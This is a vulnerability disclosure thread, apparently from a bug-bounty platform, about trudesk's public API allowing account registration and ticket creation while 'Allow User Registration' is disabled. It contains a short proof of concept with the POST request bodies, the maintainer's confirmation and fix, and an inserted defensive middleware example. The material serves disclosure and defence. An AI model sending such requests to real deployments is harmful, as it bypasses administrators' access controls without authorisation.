Register users in spite of Allow User Registration disabled in polonel/trudesk

Valid

Reported on

May 12th 2022


Description

An attacker can register a user even though Allow User Registration is disabled by default.

Proof of Concept

  1. Go to /captcha and get the captcha value and cookie.
  2. Send a POST request to /api/v1/public/account/create with the captcha value and cookie from step 1.

    // POST HOST/api/v1/public/account/create
    {
        "user": {
            "fullname": "uname",
            "email": "test@gmail.com",
            "password": "passwd"
        },
        "captcha": "captcha"
    }

  3. The user is registered successfully.

Note

The same PoC works with the Create New Ticket endpoint (/api/v1/public/tickets/create):

{"user":{"fullname":"tpa tpa2","email":"test@gmail.com"},"ticket":{"subject":"123","issue":"123"},"captcha":"Dazr"}

Impact

An attacker can register a user and get inside the dashboard.
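
One way to enforce a setting such as Allow User Registration on the API routes themselves rather than only in the UI, written as an Express-style middleware that fails closed. This is an added example, not code from the report or from trudesk, and not the 1.2.2 fix; the `settings` store, the key names `allowUserRegistration` and `allowPublicTickets`, and the handler names are assumptions.

```javascript
'use strict';

// Added example, not trudesk code. Express-style middleware (req, res, next)
// that refuses a public route unless an admin setting is explicitly on.
// `settings` is a hypothetical Map-like store; the key names are assumptions.
function requireSetting(settings, key) {
  return function gate(req, res, next) {
    let enabled = false;
    try {
      // Fail closed: a missing key, a string "true" or a lookup error all deny.
      enabled = settings.get(key) === true;
    } catch (err) {
      enabled = false;
    }
    if (!enabled) {
      return res.status(403).json({ success: false, error: 'Feature disabled' });
    }
    return next();
  };
}

// Wiring sketch, assuming an Express router and handlers named createAccount/createTicket:
//   router.post('/api/v1/public/account/create',
//     requireSetting(settings, 'allowUserRegistration'), createAccount);
//   router.post('/api/v1/public/tickets/create',
//     requireSetting(settings, 'allowPublicTickets'), createTicket);

// Stand-in for an Express response so the gate runs without the framework.
function fakeRes() {
  const res = { statusCode: 200, body: null };
  res.status = (code) => { res.statusCode = code; return res; };
  res.json = (obj) => { res.body = obj; return res; };
  return res;
}

// Drive the gate with a constructed request; report whether the handler ran.
function simulate(settings, key) {
  const req = { body: { user: { fullname: 'uname', email: 'test@gmail.com' }, captcha: 'captcha' } };
  const res = fakeRes();
  let handlerRan = false;
  requireSetting(settings, key)(req, res, () => { handlerRan = true; });
  return { handlerRan, status: res.statusCode };
}

console.log(simulate(new Map(), 'allowUserRegistration')); // setting absent: denied
console.log(simulate(new Map([['allowUserRegistration', true]]), 'allowUserRegistration'));
```

Because the gate runs before the route handler, a valid captcha and cookie are not enough on their own to reach account creation while the setting is off.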

We are processing your report and will contact the polonel/trudesk team within 24 hours. a year ago
tienpa99 modified the report
a year ago
We have contacted a member of the polonel/trudesk team and are waiting to hear back a year ago
Chris
a year ago

Maintainer


Can you try the same request once you log out of the app as yourself? It's using your permissions since you're logged in.

Chris
a year ago

Maintainer


Actually, I see the issue. I will publish a fix soon.

Chris validated this vulnerability a year ago
tienpa99 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the polonel/trudesk team. We will try again in 7 days. a year ago
Chris marked this as fixed in 1.2.2 with commit 49befa a year ago
Chris has been awarded the fix bounty
This vulnerability will not receive a CVE
tienpa99
a year ago

Researcher


Confirm the bug has been fixed.
